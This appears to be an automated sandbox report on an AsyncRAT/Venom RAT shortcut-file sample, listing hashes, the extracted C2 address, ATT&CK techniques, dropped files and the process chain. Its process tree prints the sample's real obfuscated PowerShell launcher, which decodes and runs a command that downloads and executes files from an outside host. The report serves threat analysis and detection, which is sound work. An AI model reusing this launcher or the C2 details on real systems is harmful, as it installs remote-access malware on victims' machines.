asyncrat | 0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1

General

Target

0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1.lnk
Size

2KB
MD5

7e7b20e421442d74655685583b4036de
SHA1

cf936b1fe122c6a5029c07a64a0f8674b31464af
SHA256

0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1
SHA512

e58df7f695e08bc57c30a518f35c84b9ab70597696d579291b12c2534a06b24018920cd09f4a0652dcca9791eca207646e4ce38f03bf3650c093a8db9ffe9318

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

64.112.85.3:4449

Mutex

ufaaryvntrlyhwcwq

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
16	4336	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4336	powershell.exe
4076	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\myscript.lnk	WScript.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4076 set thread context of 804	4076	powershell.exe	92

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
4336	powershell.exe
4336	powershell.exe
4076	powershell.exe
4076	powershell.exe
804	aspnet_regbrowsers.exe
804	aspnet_regbrowsers.exe
804	aspnet_regbrowsers.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4336	powershell.exe
Token: SeDebugPrivilege	4076	powershell.exe
Token: SeDebugPrivilege	804	aspnet_regbrowsers.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
804	aspnet_regbrowsers.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1156 wrote to memory of 4336	1156	cmd.exe	84
PID 1156 wrote to memory of 4336	1156	cmd.exe	84
PID 4336 wrote to memory of 532	4336	powershell.exe	88
PID 4336 wrote to memory of 532	4336	powershell.exe	88
PID 532 wrote to memory of 2148	532	WScript.exe	89
PID 532 wrote to memory of 2148	532	WScript.exe	89
PID 2148 wrote to memory of 4076	2148	cmd.exe	91
PID 2148 wrote to memory of 4076	2148	cmd.exe	91
PID 4076 wrote to memory of 804	4076	powershell.exe	92
PID 4076 wrote to memory of 804	4076	powershell.exe	92
PID 4076 wrote to memory of 804	4076	powershell.exe	92
PID 4076 wrote to memory of 804	4076	powershell.exe	92
PID 4076 wrote to memory of 804	4076	powershell.exe	92
PID 4076 wrote to memory of 804	4076	powershell.exe	92
PID 4076 wrote to memory of 804	4076	powershell.exe	92
PID 4076 wrote to memory of 804	4076	powershell.exe	92

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -NoExit -Command "$avesqBoj49s = 'aXdyIC1VcmkgaHR0cHM6Ly9xdS5heC9PekZMLnBkZiAtT3V0RmlsZSAkZW52OlRFTVBcT25saW5lIEJhbmtpbmcgUGF5bWVudCBBZHZpY2UucGRmLnBkZjtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxPbmxpbmUgQmFua2luZyBQYXltZW50IEFkdmljZS5wZGYucGRmO1N0YXJ0LVNsZWVwIC1zIDM7U3RhcnQtU2xlZXAgLXMgMztTdGFydC1TbGVlcCAtcyAzO2l3ciAtVXJpIGh0dHBzOi8vcXUuYXgvTnBsLmpzIC1PdXRGaWxlICRlbnY6VEVNUFxWeEl0RVQuanM7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcVnhJdEVULmpzOyRhaD0nWWV4cjc0SFhXNkRpJztFeGl0';$EtRpa8h = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($avesqBoj49s));Invoke-Expression -Command $EtRpa8h"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4336
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\VxItET.js"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Suspicious use of WriteProcessMemory
    PID:532
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\UPDATE.ps1""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2148
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\UPDATE.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4076
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Temp\VxItET.js

Filesize
254KB

MD5
2ab59c5bd94c0fd78986c451fc0d649f

SHA1
3e58b73c0c7ec71ffeb6ab1a09a6d6b2f6717f46

SHA256
5f0cfa1a3d66bc1e0affb028ba335f5c89f0cb684b59933d0e55f6ed75efc075

SHA512
cfd9fd56e3503ba35f6b373df8cd725957641cb45b64f54aa0cd4d5eb3ede53d1dbc9f0965c635f1566686b8331356c239ab5242586473755e5b611517745b74

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4pyddalh.uca.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\UPDATE.ps1

Filesize
250KB

MD5
85a84eff8bf73e4661824726438e21ee

SHA1
a2b5401bbe15125c0d8d9419d87425366c991fa8

SHA256
78e20b9f9e36578c45d1c0e28e68299620ce085953ab3e468ab10f633e586cfc

SHA512
e93cb30222036ef2f47dc27cc3d4c6195e6c57d12728e4955707dba69d38b469a0e7242729cebe3d59afe312c3db5bdf20e623ea939ba7f8085d9435b14bcfb0

Download Submit
memory/804-48-0x0000000006360000-0x00000000063C6000-memory.dmp

Filesize
408KB

Download
memory/804-47-0x00000000062C0000-0x000000000635C000-memory.dmp

Filesize
624KB

Download
memory/804-46-0x00000000054A0000-0x00000000054AA000-memory.dmp

Filesize
40KB

Download
memory/804-45-0x00000000054D0000-0x0000000005562000-memory.dmp

Filesize
584KB

Download
memory/804-43-0x0000000005640000-0x0000000005BE4000-memory.dmp

Filesize
5.6MB

Download
memory/804-42-0x00000000285E0000-0x00000000285F8000-memory.dmp

Filesize
96KB

Download
memory/804-40-0x00000000285E0000-0x0000000028602000-memory.dmp

Filesize
136KB

Download
memory/4076-39-0x0000021368870000-0x00000213688A4000-memory.dmp

Filesize
208KB

Download
memory/4336-15-0x000002451E580000-0x000002451E5C4000-memory.dmp

Filesize
272KB

Download
memory/4336-26-0x00007FFEE5760000-0x00007FFEE6221000-memory.dmp

Filesize
10.8MB

Download
memory/4336-18-0x00007FFEE5760000-0x00007FFEE6221000-memory.dmp

Filesize
10.8MB

Download
memory/4336-17-0x00007FFEE5760000-0x00007FFEE6221000-memory.dmp

Filesize
10.8MB

Download
memory/4336-16-0x00007FFEE5760000-0x00007FFEE6221000-memory.dmp

Filesize
10.8MB

Download
memory/4336-2-0x00007FFEE5763000-0x00007FFEE5765000-memory.dmp

Filesize
8KB

Download
memory/4336-14-0x00007FFEE5760000-0x00007FFEE6221000-memory.dmp

Filesize
10.8MB

Download
memory/4336-13-0x00007FFEE5760000-0x00007FFEE6221000-memory.dmp

Filesize
10.8MB

Download
memory/4336-3-0x000002451C000000-0x000002451C022000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing